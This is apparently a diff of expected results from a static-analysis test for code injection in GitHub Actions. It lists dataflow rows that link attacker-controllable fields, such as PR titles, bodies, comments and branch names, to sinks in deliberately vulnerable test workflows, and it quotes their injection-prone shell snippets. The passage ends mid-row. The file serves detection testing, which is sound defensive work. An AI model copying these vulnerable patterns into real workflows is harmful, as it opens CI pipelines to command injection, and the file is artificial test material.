.github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | .github/workflows/test19.yml:113:14:116:50 | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $DETAILS \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | ${{ steps.title1.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | .github/workflows/test19.yml:119:14:122:50 | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | ${{ steps.title2.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | .github/workflows/test19.yml:125:14:128:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author)\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | ${{ steps.title3.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run | edges | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | @@ -697,170 +864,3 @@ nodes subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | -#select -| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | .github/workflows/test28.yml:12:3:12:21 | pull_request_target | pull_request_target | -| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 